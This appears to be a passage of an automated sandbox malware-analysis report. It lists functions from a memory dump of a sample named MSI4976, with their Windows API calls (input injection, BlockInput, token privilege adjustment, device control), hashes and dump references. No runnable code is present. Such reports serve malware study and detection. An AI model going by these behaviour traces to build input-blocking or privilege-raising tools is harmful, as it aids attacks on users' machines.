                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0036EB3C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        • Opcode ID: 9c6ffb94f1b800168c6e58d5e3f2ac9a7e42c71a063423647d76a0410864e167
                                        • Instruction ID: 704ae7789a7477cba661e60dfee07d107760f643e6eb2141aa8f514437493b94
                                        • Opcode Fuzzy Hash: 9c6ffb94f1b800168c6e58d5e3f2ac9a7e42c71a063423647d76a0410864e167
                                        • Instruction Fuzzy Hash: 8C216035A00618EFCB01DFA5D895AEEFBB8FF49310F148099E806AB351DB31D905CB50
                                        Function 0036702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0036704C
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0036708D
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00367098
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: b6342eb56ef984b0f6c121fbb3e1f93286e6db8a936f02c5d8c965ab8239f329
                                        • Instruction ID: 29145fcdc6a63d00b3a9833209d88ab4bc9117890f62949685e900480453f56c
                                        • Opcode Fuzzy Hash: b6342eb56ef984b0f6c121fbb3e1f93286e6db8a936f02c5d8c965ab8239f329
                                        • Instruction Fuzzy Hash: 63115E71E04228BFEB118F94DC45BAEBBBCEB49B10F108152F900E7290D7B05A058BA1
                                        Function 0033AFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • GetParent.USER32(?), ref: 0039F4B5
                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0033ADDD,?,?,?,00000006,?), ref: 0039F52F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LongWindow$DialogNtdllParentProc_
                                        • String ID:
                                        • API String ID: 314495775-0
                                        • Opcode ID: 33720a2246800abf95db54a318ecc9cd08013fc0916f7c7208accd0f107bd26d
                                        • Instruction ID: 03eb34c9cdf1f07b9e858dc85a267cc545bfaec9c029420258cc1e25050f3a43
                                        • Opcode Fuzzy Hash: 33720a2246800abf95db54a318ecc9cd08013fc0916f7c7208accd0f107bd26d
                                        • Instruction Fuzzy Hash: 00216535600154AFCF3B9F28D888AEA7BA6AF06364F194264F6258B2F2D7709E11D750
                                        Function 0038F45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 0038F47D
                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0039F42E,?,?,?,?,?), ref: 0038F4A6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClientDialogNtdllProc_Screen
                                        • String ID:
                                        • API String ID: 3420055661-0
                                        • Opcode ID: 16470ec06e600f5f984dc23319f01fbee414996bb54f81f795bf06e9c2eb1575
                                        • Instruction ID: d6e81ad5f09d04d125dbf307ebe476aae541089e0ddc142428e9dea8639d6d65
                                        • Opcode Fuzzy Hash: 16470ec06e600f5f984dc23319f01fbee414996bb54f81f795bf06e9c2eb1575
                                        • Instruction Fuzzy Hash: D8F01772410118BFEB069F95DC099AE7BBCFF49351F14405AF902A2160D7B5AA51AB60
                                        Function 0036D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0037C2E2,?,?,00000000,?), ref: 0036D73F
                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0037C2E2,?,?,00000000,?), ref: 0036D751
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 9d9fed2e90a19aaff2ac4e87dd4a07d5b01be77cd17bcdd745e50826964dcfcf
                                        • Instruction ID: 049a178d749490974dae2fa366af68beedbf1676b31a9cbc4bcca61614b8a40e
                                        • Opcode Fuzzy Hash: 9d9fed2e90a19aaff2ac4e87dd4a07d5b01be77cd17bcdd745e50826964dcfcf
                                        • Instruction Fuzzy Hash: 71F08C3550032DABDB22AFA4DC49FEA776CEF4A361F008125B94AD6191D6709A40CBA1
                                        Function 00364B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00364B89
                                        • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00364B9C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: f6ae49066469b93925d7511582142c36bb698f95ab4a434f7cbdb4f012968382
                                        • Instruction ID: 863dd2161314d48b93a3da30aa60a9fb730622f578751e1fd370a6eb5535299a
                                        • Opcode Fuzzy Hash: f6ae49066469b93925d7511582142c36bb698f95ab4a434f7cbdb4f012968382
                                        • Instruction Fuzzy Hash: 8AF01D7090424DAFDB068FA5C805BBE7FB8EF05305F04C409F995A6191D779C6159F94
                                        Function 0035B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0035B8C5
                                        • CloseHandle.KERNEL32(?), ref: 0035B8D7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: d50a90d278768705be49a3476b2905d445f42d9fdf0ce22b03fc44f216a6437c
                                        • Instruction ID: b7d87d6b8afac72537fcd20cc4a1570ac397fa54e418011ee74967d3b497252e
                                        • Opcode Fuzzy Hash: d50a90d278768705be49a3476b2905d445f42d9fdf0ce22b03fc44f216a6437c
                                        • Instruction Fuzzy Hash: A6E0E676004511AFE7272B50EC45D77B7EDEF05311B118419F55689870D7716CD1DB10
                                        Function 0038F594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0038F59C
                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0039F3AD,?,?,?,?), ref: 0038F5C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 684dd92d136c4c58934d2db48172bc445a19834ea53db3907b18e5f48d1e6404
                                        • Instruction ID: 434908dfa07cc5fb921fe2ab2bd966e50fb7dd1572e829088e8347af246c6456
                                        • Opcode Fuzzy Hash: 684dd92d136c4c58934d2db48172bc445a19834ea53db3907b18e5f48d1e6404
                                        • Instruction Fuzzy Hash: 77E08C70104218BBEB161F09DC1AFB93B58EB02B50F108626F917C84E0D7B089A0D760
                                        Function 00348E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0032125D,00347A43,00320F35,?,?,00000001), ref: 00348E41
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00348E4A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: b1002036e4d9c8faa931733208a05cfbda7f5a000bf86d44d160587c2cf04d8d
                                        • Instruction ID: 96342b671dda3b1a0cb2541a55c53f9076dc01b4bc2c7ad296cf2871e0caca9e
                                        • Opcode Fuzzy Hash: b1002036e4d9c8faa931733208a05cfbda7f5a000bf86d44d160587c2cf04d8d
                                        • Instruction Fuzzy Hash: DBB09275044A08ABEE026BA1EC09B883F6CEB0BB62F004010F61E448A08BA354508E92
                                        Function 0035113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6185fb346d98807f7c979cd5ad5473beba7da1075082a70b350a895c84ba701b
                                        • Instruction ID: 0375f62b2ee0a7ad48df1a901161b0c6a17b2a74226dc37bb59a9b6905b28bda
                                        • Opcode Fuzzy Hash: 6185fb346d98807f7c979cd5ad5473beba7da1075082a70b350a895c84ba701b
                                        • Instruction Fuzzy Hash: FCB1E320E2AF514DD723A6398831336B65CAFBB3D9F91D71BFD1A74D62EB2185834180
                                        Function 003902AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00390352
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 907aafb1bd32cb471acf3096ca2beaee4738292796d5acfddaec8c155eb5595b
                                        • Instruction ID: 6604a28c6d4ab28836358168d7ad68cd66651a1109f6cc5215f000c1d7a1709d
                                        • Opcode Fuzzy Hash: 907aafb1bd32cb471acf3096ca2beaee4738292796d5acfddaec8c155eb5595b
                                        • Instruction Fuzzy Hash: 48112335204265AFEF2B6F2CCC85F7D3B68EB41760F644314F9125E5E2CA708D00D2A9
                                        Function 0038E769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0038E7AF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$CallLongProc
                                        • String ID:
                                        • API String ID: 4084987330-0
                                        • Opcode ID: 7e92c19691a8bb91bb342a1066c8c1d8d3d2e6ad281c801b5067d304525b0f14
                                        • Instruction ID: f54dd74f17c6481faf40fdaff71d84e8189d31058828042f2924a882f1e30a18
                                        • Opcode Fuzzy Hash: 7e92c19691a8bb91bb342a1066c8c1d8d3d2e6ad281c801b5067d304525b0f14
                                        • Instruction Fuzzy Hash: 9FF0FF35204208EFCF06AF54DC44DB93BAAEB05360F044554FD158A6A1D7329D60EB50
                                        Function 0038EA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B736: GetCursorPos.USER32(000000FF), ref: 0033B749
                                          • Part of subcall function 0033B736: ScreenToClient.USER32(00000000,000000FF), ref: 0033B766
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000001), ref: 0033B78B
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000002), ref: 0033B799
                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0039F417,?,?,?,?,?,00000001,?), ref: 0038EA9C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                        • String ID:
                                        • API String ID: 2356834413-0
                                        • Opcode ID: d19611a002737a7077294a0c07cf9bb62e484923d57cf09c636ecb8efdfa595f
                                        • Instruction ID: b4edf4eb765c22388782211229df85b54901540da3473566a2a7d1b835acd3fa
                                        • Opcode Fuzzy Hash: d19611a002737a7077294a0c07cf9bb62e484923d57cf09c636ecb8efdfa595f
                                        • Instruction Fuzzy Hash: 99F08C31200229ABDB16AF19CC4AABE3BA5FB01B90F044015F91A1E1A1D77A9861DBE1
                                        Function 0033B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0033AF40,?,?,?,?,?), ref: 0033B83B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: a54619512ac6836d79e16bcf274353bdee7845620bd443a84951f8bad8026063
                                        • Instruction ID: ec394ab4381296747be4e6b6313413acb611d52bf1c3c4b75f581d0a680a496d
                                        • Opcode Fuzzy Hash: a54619512ac6836d79e16bcf274353bdee7845620bd443a84951f8bad8026063
                                        • Instruction Fuzzy Hash: 51F05E306002599FDF1A9F15D8D19393BAAFB05360F144329F9528F2E1D771D850DB50
                                        Function 0037703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 00377057
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: dc7a4972f490009e1372d4ca212d7e3a62e77c5c3d7307638f764c904e620adf
                                        • Instruction ID: 4396cc0028b5a3ef92d089dd55ed14b0f9f644ff68ad59fb183afcdaf8645355
                                        • Opcode Fuzzy Hash: dc7a4972f490009e1372d4ca212d7e3a62e77c5c3d7307638f764c904e620adf
                                        • Instruction Fuzzy Hash: 7BE048763142145FD711DF69D408D96F7DC9F55750F01C426F949D7251DAB4E9008B90
                                        Function 0038F3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0038F41A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
